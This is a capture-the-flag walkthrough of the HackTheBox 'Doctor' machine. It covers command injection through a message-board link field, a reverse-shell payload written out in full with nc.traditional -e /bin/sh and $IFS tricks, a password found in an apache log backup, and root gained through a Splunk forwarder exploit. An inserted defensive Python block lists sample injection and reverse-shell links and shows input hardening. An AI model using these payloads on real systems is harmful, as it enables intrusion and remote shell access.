Doctor HTB
Doctor Box walkthrough by fuxsocy


As always we start by scanning for open ports using nmap. Three ports are open: 22 (ssh), 80 (http) and 8089 (ssl/https).

80 http

Once I visit the IP in my browser I get a webpage.


The only information I get from this is the hostname doctors.htb, from the "Send us a message" section. I add it to my hosts file.


There is a login page, but also the functionality to register. After registering:


The app logs me in automatically. There is also a message letting me know that my account has a time limit of twenty minutes. Using the New Message button we can post a message to something that looks like a board.


I provide a URL pointing to my own machine as the Content of the message.



And I get a request back, which means we have something like a command injection. Let’s try to execute a wget command by using $(wget, but I get "link posted is not valid". Let’s instead try to execute a command using http://IP/$(id), so we get back the result of id as the requested file.


Now I can execute commands inside $(). Let’s execute a reverse shell.


Nothing happened. I try $IFS instead of spaces, but again it doesn’t work; I had to find the nc binary on the machine and wrap the arguments in single quotes to get it to work. This is the complete command: $(/usr/bin/nc.traditional$IFS-e$IFS/bin/sh$IFS''$IFS'7979')
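The two injection steps above work because the server hands the posted link straight to a shell, so $(...) and $IFS are expanded before wget ever runs. As an added illustration (this is not the box's application code, which the walkthrough does not show, and wget, the /tmp/preview output path and the ATTACKER_IP placeholder are assumptions) here is a hypothetical Python version of that vulnerable pattern beside a hardened one: the link is rejected if it carries any shell metacharacter, it must parse as an http(s) URL, and the fetch is run as an argv list with no shell at all.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Constructed sample submissions for the "Content" field (not from the original post).
# ATTACKER_IP is a placeholder, not a real address.
SAMPLE_LINKS = [
    "https://example.com/page?x=1",                                      # benign link
    "http://ATTACKER_IP/$(id)",                                          # command substitution
    "http://ATTACKER_IP/$(/usr/bin/nc.traditional$IFS-e$IFS/bin/sh)",   # $IFS in place of spaces
    "http://example.com/`id`",                                           # backtick substitution
    "ftp://example.com/file",                                            # wrong scheme
]

# Characters that must never reach a command line built from user input.
# '?' and '#' are deliberately allowed: they are legitimate URL syntax and are
# harmless once no shell is involved.
SHELL_META = re.compile(r"[\s$`;|&<>(){}'\"\\]")


def vulnerable_command(link: str) -> str:
    """The pattern exploited in the writeup: user input pasted into a shell string.
    Only returns the string, it is never executed here. Run with shell=True the
    shell would expand $(...) before wget sees the link."""
    return f"wget -q -O /tmp/preview {link}"


def validate_link(link: str):
    """Return the canonical URL if it is an http(s) link without shell metacharacters,
    otherwise None. URL parsing alone is not enough: urlsplit keeps $(id) as an
    ordinary path segment, so the metacharacter check comes first."""
    if not link or len(link) > 2048 or SHELL_META.search(link):
        return None
    parts = urlsplit(link)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return parts.geturl()


def safe_fetch_argv(link: str) -> list:
    """Build argv for the fetch. No shell is involved, so even a link that slipped
    past validation would be one argument to wget, not shell syntax.
    '--' stops a link starting with '-' from being read as a wget option."""
    url = validate_link(link)
    if url is None:
        raise ValueError("link posted is not valid")
    return ["wget", "-q", "--timeout=5", "-O", "/tmp/preview", "--", url]


def safe_fetch(link: str) -> int:
    """Run the fetch without a shell; returns wget's exit code."""
    return subprocess.run(safe_fetch_argv(link), shell=False, timeout=10).returncode


def triage(links):
    """Classify submissions: returns {link: 'accepted' | 'rejected'}."""
    return {link: ("accepted" if validate_link(link) else "rejected") for link in links}


if __name__ == "__main__":
    for link, verdict in triage(SAMPLE_LINKS).items():
        print(f"{verdict:8} {link}")
    print("shell string the vulnerable version would hand to /bin/sh:")
    print("  ", vulnerable_command(SAMPLE_LINKS[1]))
```

The "link posted is not valid" message the walkthrough hits shows the real application did filter something; the point of the hardened version is that the filter is not what keeps the host safe, the absence of a shell is. Rejecting metacharacters just gives a cleaner error and a log line worth alerting on.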



After getting the shell I look for passwords to escalate to another user. After a while I find a backup file inside /var/log/apache2/, and there is a password inside it.


I use it for the user shaun, which gives me user.txt.


Inside /opt/ I find splunkforwarder. Searching for this I learn that the forwarder is used to collect data and forward it to the Splunk software, which seems to be a kind of visualization software. Reading README-splunk.txt I get the version, but I didn’t manage to find an exploit for that exact version. I also find a GitHub repo with a script to exploit it. I get the local exploit and upload it to the target machine, but I get an error about missing modules, and I can’t install them using pip. So I try the remote exploit from my local machine: I create a file inside /tmp/ containing a reverse shell and then execute the script, while listening on the specified port.


And I get root access.


The quieter you become, the more you are able to hear.